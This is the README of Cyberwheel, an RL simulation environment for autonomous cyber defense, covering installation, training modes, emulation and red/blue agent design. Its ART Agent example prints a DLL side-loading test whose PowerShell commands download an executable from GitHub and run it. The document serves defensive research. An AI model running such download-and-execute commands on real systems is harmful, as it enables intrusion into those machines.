A reinforcement learning simulation environment focused on autonomous cyber defense
With the latest major update to cyberwheel, we've implemented various new features, namely Emulation and Multi-Agent support! The first iteration of our emulator environment is now live, with instructions on setup located in cyberwheel/emulator/README.md. Cyberwheel environments now also support training and evaluating multiple RL agents in tandem, allowing you to train an RL Red Agent against an RL Blue Agent, both learning simultaneously. The new features are described in more detail below:
As mentioned above, cyberwheel now supports training multiple agents in the environment. To do so, enter the red and blue agents' config filenames in the 'red' and 'blue' arguments of the training configuration. You may use any of the RL Red/Blue YAML files in the cyberwheel/data/configs agent directories, and the training config YAML files in cyberwheel/data/configs/environment, as references.
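For illustration, the relevant fragment of a training config might look like the sketch below; the filenames are assumptions, so check the agent config directories and the files in cyberwheel/data/configs/environment for the real values.

```yaml
# Hypothetical fragment of a multi-agent training config; filenames are
# assumptions. Use the actual files shipped in cyberwheel/data/configs.
red: rl_red_agent.yaml     # an RL red agent config from the red_agent config directory
blue: rl_blue_agent.yaml   # an RL blue agent config from the blue_agent config directory
```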
For our emulator, we've incorporated the FIREWHEEL network emulation tool by Sandia National Laboratories. More information on setting this up and getting it running can be found here.
We've also implemented the ability to train an agent on multiple different networks in one training run, by supporting three fixed maximum observation space sizes. These sizes are:
| Config Argument | Max # of hosts in network | Max # of subnets in network |
|---|---|---|
| small | 100 | 10 |
| medium | 1000 | 100 |
| large | 10000 | 1000 |
This allows a single policy with a fixed observation space and action space to train on many different networks. During training, the network the agent trains on in a given episode is randomly selected from the ones listed. During the checkpoint evaluations of the training run, evaluations are run on all networks in the pool in order to judge the agent's performance on each network individually.
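As a sketch of how this might be expressed (the key names and filenames below are assumptions, not the exact schema; use the training configs in cyberwheel/data/configs/environment as the reference):

```yaml
# Hypothetical multi-network training fragment; key names and filenames are illustrative.
network_size: medium            # one of: small, medium, large (see the table above)
networks:                       # pool of network configs to sample from each episode
  - example_network_small.yaml
  - example_network_large.yaml
```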
Looking forward, there are various other features we are planning to add to Cyberwheel, many of which are listed here, along with some QoL changes:
- Unit Testing
- More modular red agent killchains
- Detailed documentation
- Multi-Agent Support (> 2 RL agents at a time)
Cyberwheel is a Reinforcement Learning (RL) simulation environment built for training and evaluating autonomous cyber defense models on simulated networks. It was built with modularity in mind, to allow users to build on top of it to fit their needs. It supports various robust configuration files to build networks, services, host types, offensive/defensive agents, and more.
Motivations:
- Extensibility - allowing defensive actions and offensive strategies to be modified and added without requiring structural changes to the codebase.
- Scalability - supporting training on large networks with minimal performance cost
This environment allows for RL training and evaluations with a large set of configurable arguments to swap out networks, strategies, agents, RL parameters, and more. It also includes a visualization server built on Dash that displays evaluations as a readable graph of agent actions throughout the episodes.
- python==3.10
This project runs on, and has been tested with, Python 3.10. Once installed, poetry should automatically use this version for its virtual environment.
- poetry
Cyberwheel uses poetry to manage and install python packages. For instructions on how to install poetry, visit their installation page.
- graphviz
For the dash server visualization to function, you need graphviz, an open source graph visualization software, installed on your system.
Instructions for installing graphviz can be found in their documentation.
Once all dependencies are installed:
- If you haven't already, clone the cyberwheel repo with HTTPS:

```
git clone https://github.com/ORNL/cyberwheel.git
```

or with SSH:

```
git clone git@github.com:ORNL/cyberwheel.git
```
- Install packages and resolve dependencies
poetry install
- (Optional) If running into issues with poetry, you can create your own venv and install from requirements.txt
```
python3.10 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
```
On newer MacOS systems running on Apple Silicon chips, there may be an error installing the pygraphviz package, with poetry not finding the graphviz configuration files. You can work around this by pip installing the pygraphviz package manually, explicitly passing graphviz config paths. This link helped me work through this issue.
Feel free to comment out this package in requirements.txt if you want to use cyberwheel without the visualizations and debug this package installation separately.
To run any cyberwheel scripts, shell into the poetry virtual environment:

```
poetry shell
```

or activate your venv if not using poetry:

```
source venv/bin/activate
```

When you want to deactivate the poetry environment, you can just hit Ctrl+D, which will exit the virtual environment shell. If using a venv, just run:

```
deactivate
```

For a full list of parameters, you can run:

```
python3 -m cyberwheel -h
```

or look at the config files in cyberwheel/data/configs/environment.
There are 5 modes for running cyberwheel: train, evaluate, emulate, visualizer, and run
To train a model on our environment, you can run
```
python3 -m cyberwheel train [config_file.yaml]
```

which will run training with the parameters defined in the YAML config file. It will save the model during evaluations in the models/ directory. If tracking to Weights & Biases, the model and its checkpoints will be saved on your W&B project as well as locally. This way, you can also view real-time training progress on your W&B account.
Cyberwheel allows for a wide array of configuration options to be passed as arguments. These parameters are defined in config files stored in the cyberwheel/data/configs/environment directory, which you can pass when training, evaluating, or just running cyberwheel. You may also pass any parameter on the command line, and it will override the value stored in the YAML file.
Example:
```
python3 -m cyberwheel train train_rl_red_agent_vs_rl_blue_agent.yaml
```

will train both an RL Red and an RL Blue agent using the parameters defined in cyberwheel/data/configs/environment/train_rl_red_agent_vs_rl_blue_agent.yaml.
You can evaluate a model given the parameters defined in the YAML file or on the command line. For example, to evaluate the RL blue and red agents you just trained, you can run:
```
python3 -m cyberwheel evaluate evaluate_rl_red_vs_rl_blue.yaml
```

which will evaluate the trained red and blue models using the parameters defined in the config file. In order to evaluate, the experiment_name parameter must be set to the name of a model directory that exists at cyberwheel/data/models/{experiment_name}. If the training run was tracked to Weights & Biases, the model and its checkpoints can also be downloaded from your W&B project. The experiment_name argument, like all other arguments, can be defined in the config or overridden on the command line like so:
```
python3 -m cyberwheel evaluate evaluate_rl_red_vs_rl_blue.yaml --experiment-name TrainRedBlueAgent
```

The command to run an emulation is essentially the same as the one to run an evaluation, just with emulate swapped in for evaluate. You will need to have the emulation environment and FIREWHEEL set up first; the tutorial for that can be found in the emulator directory.
```
python3 -m cyberwheel emulate evaluate_rl_red_vs_rl_blue.yaml --experiment-name TrainRedBlueAgent
```

To view the visualizations of the evaluations that were run, you can run the visualization server with:
```
python3 -m cyberwheel visualizer [PORT_NUM]
```

This will run a Dash server locally on the port number passed. You can then visit http://localhost:PORT_NUM/ to access the frontend. From there, you can find the evaluation you ran in the list and view the network state over the course of each episode with a step slider.
Another option is to run the cyberwheel environment without any RL components. The two agents currently connected to this environment are inactive red/blue agents, meaning the environment simply runs through its steps without any actions being taken. This mode is not as in-depth or exhaustive, but it provides a framework for tailoring the Cyberwheel environment to your use case.
```
python3 -m cyberwheel run cyberwheel.yaml
```

To walk through a full train/evaluate/visualize cycle, first train the agents:

```
python3 -m cyberwheel train train_rl_red_agent_vs_rl_blue_agent.yaml
```

This may run long depending on hardware. For demo purposes, you can Ctrl+C after a few training iterations or change the total_timesteps argument in the config file.
```
python3 -m cyberwheel evaluate evaluate_rl_red_vs_rl_blue.yaml
```

This will evaluate the model under the current environment and save the logs of the evaluation in cyberwheel/data/action_logs/{graph_name}.csv. If the visualize parameter is set to true, this will also generate and store visualizations in cyberwheel/data/graphs/{graph_name}/ to be viewed later. (Note: visualization generation has a longer runtime than a basic evaluation, so if you only care about the CSV logs, you can set it to false to greatly speed up the evaluation.)
Once these have run, you can run the server on http://localhost:8050 by running:
```
python3 -m cyberwheel visualizer 8050
```

and access the server in your browser to see a list of the available graphs. These depend on what is listed in the cyberwheel/data/graphs/ directory.
Networks in Cyberwheel are composed of routers, subnets, and hosts, represented as nodes in a networkx graph.
- Routers manage network traffic between Subnets.
- Subnets represent the broadcast domain and manage network traffic between Hosts.
- Hosts are machines/devices that belong to a subnet; they contain a list of running services with ports, CVEs, and other attributes.

Cyberwheel builds networks from a config YAML file.
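As a rough sketch of what such a file expresses (the keys below are illustrative assumptions, not the actual Cyberwheel schema; see the network configs under cyberwheel/data/configs for the real format):

```yaml
# Illustrative network sketch; field names are assumptions.
routers:
  core_router:
    routes: [user_subnet, server_subnet]
subnets:
  user_subnet:
    router: core_router
    ip_range: 192.168.0.0/24
hosts:
  user_workstation_1:
    subnet: user_subnet
    host_type: workstation
    services:
      - name: smb
        port: 445
        cves: [CVE-2017-0144]   # example CVE attached to a running service
```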
The RL blue agent is largely focused on deploying Decoys to slow and/or stop red agent attacks throughout the network. The blue agent's actions and logic can be configured and defined in a YAML file, allowing for greater modularity. Different configurations of blue agents are defined in cyberwheel/data/configs/blue_agent/. Its observation space is defined by the entire network and the alerts flagged by the detectors it has set up.
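As a hedged illustration of what a blue agent config might express (the action names, keys, and reward values below are assumptions; consult the files in cyberwheel/data/configs/blue_agent/ for the real schema):

```yaml
# Illustrative blue agent sketch; keys and values are assumptions.
actions:
  - name: deploy_decoy
    decoy_type: server_decoy   # hypothetical decoy type defined in the decoy configs
  - name: remove_decoy
reward:
  decoy_cost: -1               # hypothetical per-step cost for each deployed decoy
```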
The RL red agent is built around the Atomic Red Team techniques, with goals that you configure. Different configurations can be found in cyberwheel/data/configs/red_agent/. Its observation space is defined by its (initially limited) view of the network as it explores. As it performs certain correct actions, this view can expand up to the size of the network.
The Atomic Red Team (ART) agent is a heuristic agent with a set of defined rules and strategies it can use to traverse a network, although the logic that dictates which Hosts it chooses to target is modular. Its actions are mapped from MITRE ATT&CK Killchain Phases (Discovery, Lateral Movement, Privilege Escalation, Impact) to Atomic Red Team (ART) techniques. We've defined these techniques with a set of attributes mapped from existing cyber attack data. This allows our ART Agent to run a higher-level killchain phase (e.g. Discovery) on a host, and the environment will cross-reference the target host's attributes with ART Technique attributes. A technique is valid for the attack if:
- Technique includes the target host's OS in its supported platforms
- Technique includes the killchain phase in its supported killchain phases
- Technique can exploit any CVE that is present on the target host
If all of these conditions are met, the agent can successfully run the killchain attack on the host. These ART Techniques include Atomic Tests, which give tangible commands to run in order to execute the given attack. With this methodology, the simulator is able to transform a general killchain phase into a valid set of commands that could be run in the real world.
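To make the cross-referencing concrete, a technique definition carries roughly the following kinds of attributes. The field names below are illustrative assumptions, not the actual data format; only the MITRE ATT&CK ID and atomic test name are real.

```yaml
# Illustrative ART Technique entry; field names are assumptions.
T1574.002:                          # Hijack Execution Flow: DLL Side-Loading
  name: DLL Side-Loading
  killchain_phases: [privilege-escalation]
  supported_platforms: [windows]
  cves: []                          # CVEs this technique can exploit, matched against the host
  atomic_tests:
    - DLL Side-Loading using the Notepad++ GUP.exe binary
```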
Example
- ART Agent runs Privilege Escalation on Host.
- ART Agent runs OS, Killchain Phase, and CVE checks.
- ART Agent uses ART Technique: DLL Side-Loading.
- ART Agent chooses a random Atomic Test.
- Atomic Test adds the following commands to Host metadata:
```
New-Item -Type Directory (split-path "${gup_executable}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "${gup_executable}"
if (Test-Path "${gup_executable}") {exit 0} else {exit 1}
"${gup_executable}"
taskkill /F /IM ${process_name} >nul 2>&1
```

The ART Campaign is very similar to the ART Agent, but its actions are much more specific. Where the ART Agent works with higher-level actions that may filter down into more specific actions, the ART Campaign is defined with a killchain of specific ART Techniques. ART Campaigns are helpful for narrower use cases, such as simulating a defined killchain of techniques on a defined network, as well as when testing with emulation. When running emulations, we train and evaluate exclusively with ART Campaigns, due to their granular use case and transferability.
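As a hedged sketch, a campaign config would spell out the exact technique sequence rather than high-level phases. The keys below are assumptions; the technique IDs are real MITRE ATT&CK IDs chosen for illustration.

```yaml
# Illustrative ART Campaign sketch; keys are assumptions, not the shipped schema.
# The killchain lists specific ART Techniques in the order they should run.
killchain:
  - T1595.001   # Active Scanning: Scanning IP Blocks (discovery)
  - T1021.004   # Remote Services: SSH (lateral movement)
  - T1574.002   # Hijack Execution Flow: DLL Side-Loading (privilege escalation)
  - T1485       # Data Destruction (impact)
```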
Red actions produce Alerts, which contain information such as the action's source host, target host, exploited services, and techniques. The blue agent has a detector layer set up to catch red agent actions on the network and surface them as Alerts. These detectors can filter out Alerts, add noise, or even create false-positive Alerts. You can use multiple detectors together to capture various red agent behaviors. These alerts are then converted into the observation space the RL agent uses to train.
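For instance, a detector configuration might look roughly like the sketch below; the detector names, keys, and probabilities are illustrative assumptions, so see the detector configs under cyberwheel/data/configs for the real options.

```yaml
# Illustrative detector sketch; names and parameters are assumptions.
detectors:
  - name: perfect_detector
    detection_probability: 1.0    # reports every red action it can see
  - name: noisy_nids
    detection_probability: 0.9    # occasionally misses real red actions
    false_positive_rate: 0.05     # occasionally emits Alerts with no red action behind them
```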
All configurations are stored in the cyberwheel/data/configs directory. You can use these configs to define the environment, red agents, campaigns, blue agents, decoy types, detectors, host types, networks, and services.
If you are not familiar with SOLID principles, please read this before contributing. Pretty basic, but makes a huge difference down the road --- Article on SOLID.
If you need to add a dependency, this project is packaged with poetry. Please take a few minutes to read about the basics before adding any dependencies. Do not use pip, do not use requirements.txt. TLDR: use poetry add <dependency name>. After adding your dependency, add and commit the new poetry.lock file.
Distributed under the MIT License. See LICENSE for more information.
Sean Oesch - [email protected]
Amul Chaulagain - [email protected]
Phillipe Austria - [email protected]
Matthew Dixson - [email protected]
Brian Weber - [email protected]
Cory Watson - [email protected]
Project Link: https://github.com/ORNL/cyberwheel/
(2024) Towards a High Fidelity Training Environment for Autonomous Cyber Defense Agents
